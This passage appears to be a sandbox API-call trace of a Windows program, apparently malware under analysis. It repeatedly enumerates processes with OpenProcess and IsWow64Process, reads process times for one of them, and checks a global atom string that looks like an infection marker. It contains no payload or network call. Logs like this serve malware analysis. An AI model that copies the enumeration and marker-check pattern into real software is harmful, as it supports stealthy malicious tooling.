	[0140.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.537] CloseHandle (hObject=0x2dc) returned 1
	[0140.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.537] CloseHandle (hObject=0x2dc) returned 1
	[0140.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.538] CloseHandle (hObject=0x2dc) returned 1
	[0140.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.538] CloseHandle (hObject=0x2dc) returned 1
	[0140.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.538] CloseHandle (hObject=0x2dc) returned 1
	[0140.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.538] CloseHandle (hObject=0x2dc) returned 1
	[0140.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.539] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.539] CloseHandle (hObject=0x2dc) returned 1
	[0140.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.539] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.539] CloseHandle (hObject=0x2dc) returned 1
	[0140.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.539] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.539] CloseHandle (hObject=0x2dc) returned 1
	[0140.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.539] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.539] CloseHandle (hObject=0x2dc) returned 1
	[0140.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.540] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.540] CloseHandle (hObject=0x2dc) returned 1
	[0140.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.540] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.540] CloseHandle (hObject=0x2dc) returned 1
	[0140.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.541] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.541] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.541] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.542] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.542] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.542] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.542] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.542] CloseHandle (hObject=0x2dc) returned 1
	[0140.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.542] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.542] CloseHandle (hObject=0x2dc) returned 1
	[0140.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.543] CloseHandle (hObject=0x2dc) returned 1
	[0140.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.543] CloseHandle (hObject=0x2dc) returned 1
	[0140.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.543] CloseHandle (hObject=0x2dc) returned 1
	[0140.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.543] CloseHandle (hObject=0x2dc) returned 1
	[0140.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.581] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.581] CloseHandle (hObject=0x2dc) returned 1
	[0140.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.582] CloseHandle (hObject=0x2dc) returned 1
	[0140.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.582] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.582] CloseHandle (hObject=0x2dc) returned 1
	[0140.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.583] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.583] CloseHandle (hObject=0x2dc) returned 1
	[0140.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.583] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.583] CloseHandle (hObject=0x2dc) returned 1
	[0140.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.583] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.583] CloseHandle (hObject=0x2dc) returned 1
	[0140.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.584] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.584] CloseHandle (hObject=0x2dc) returned 1
	[0140.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.584] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.584] CloseHandle (hObject=0x2dc) returned 1
	[0140.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.584] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.584] CloseHandle (hObject=0x2dc) returned 1
	[0140.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.585] CloseHandle (hObject=0x2dc) returned 1
	[0140.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.585] CloseHandle (hObject=0x2dc) returned 1
	[0140.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.585] CloseHandle (hObject=0x2dc) returned 1
	[0140.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.585] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.585] CloseHandle (hObject=0x2dc) returned 1
	[0140.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.586] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.586] CloseHandle (hObject=0x2dc) returned 1
	[0140.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.586] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.586] CloseHandle (hObject=0x2dc) returned 1
	[0140.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.586] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.586] CloseHandle (hObject=0x2dc) returned 1
	[0140.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.587] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.587] CloseHandle (hObject=0x2dc) returned 1
	[0140.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.587] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.587] CloseHandle (hObject=0x2dc) returned 1
	[0140.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.587] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.587] CloseHandle (hObject=0x2dc) returned 1
	[0140.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.587] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.587] CloseHandle (hObject=0x2dc) returned 1
	[0140.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.588] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.588] CloseHandle (hObject=0x2dc) returned 1
	[0140.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0140.588] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.588] CloseHandle (hObject=0x2dc) returned 1
	[0140.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0140.588] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.588] CloseHandle (hObject=0x2dc) returned 1
	[0140.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0140.589] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.589] CloseHandle (hObject=0x2dc) returned 1
	[0140.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0140.589] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.589] CloseHandle (hObject=0x2dc) returned 1
	[0140.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0140.589] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.589] CloseHandle (hObject=0x2dc) returned 1
	[0140.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0140.589] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.589] CloseHandle (hObject=0x2dc) returned 1
	[0140.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0140.590] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.590] CloseHandle (hObject=0x2dc) returned 1
	[0140.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0140.590] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.590] CloseHandle (hObject=0x2dc) returned 1
	[0140.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.590] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.590] CloseHandle (hObject=0x2dc) returned 1
	[0140.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0140.591] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.591] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.591] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.591] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.592] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.592] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.592] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.592] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.592] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.592] CloseHandle (hObject=0x2dc) returned 1
	[0140.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0140.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.593] CloseHandle (hObject=0x2dc) returned 1
	[0140.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0140.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.593] CloseHandle (hObject=0x2dc) returned 1
	[0140.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0140.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.593] CloseHandle (hObject=0x2dc) returned 1
	[0140.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0140.593] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.593] CloseHandle (hObject=0x2dc) returned 1
	[0140.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0140.594] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.594] CloseHandle (hObject=0x2dc) returned 1
	[0140.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0140.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0140.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0140.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0140.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0140.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0140.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0140.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0140.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0140.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0140.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0140.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0140.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0140.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0140.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0140.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0140.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0140.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0140.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0140.630] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.630] CloseHandle (hObject=0x2dc) returned 1
	[0140.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0140.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0140.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0140.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.631] CloseHandle (hObject=0x2dc) returned 1
	[0140.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0140.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0140.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.631] CloseHandle (hObject=0x2dc) returned 1
	[0140.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0140.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.631] CloseHandle (hObject=0x2dc) returned 1
	[0140.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0140.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.632] CloseHandle (hObject=0x2dc) returned 1
	[0140.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0140.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.632] CloseHandle (hObject=0x2dc) returned 1
	[0140.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0140.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.632] CloseHandle (hObject=0x2dc) returned 1
	[0140.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0140.632] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.632] CloseHandle (hObject=0x2dc) returned 1
	[0140.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0140.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0140.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.633] CloseHandle (hObject=0x2dc) returned 1
	[0140.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0140.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.633] CloseHandle (hObject=0x2dc) returned 1
	[0140.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0140.633] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.633] CloseHandle (hObject=0x2dc) returned 1
	[0140.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0140.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.634] CloseHandle (hObject=0x2dc) returned 1
	[0140.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0140.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.634] CloseHandle (hObject=0x2dc) returned 1
	[0140.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0140.634] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.634] CloseHandle (hObject=0x2dc) returned 1
	[0140.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0140.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.635] CloseHandle (hObject=0x2dc) returned 1
	[0140.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0140.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.635] CloseHandle (hObject=0x2dc) returned 1
	[0140.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0140.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.635] CloseHandle (hObject=0x2dc) returned 1
	[0140.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0140.635] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.635] CloseHandle (hObject=0x2dc) returned 1
	[0140.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0140.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.636] CloseHandle (hObject=0x2dc) returned 1
	[0140.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0140.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.636] CloseHandle (hObject=0x2dc) returned 1
	[0140.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0140.636] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.636] CloseHandle (hObject=0x2dc) returned 1
	[0140.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
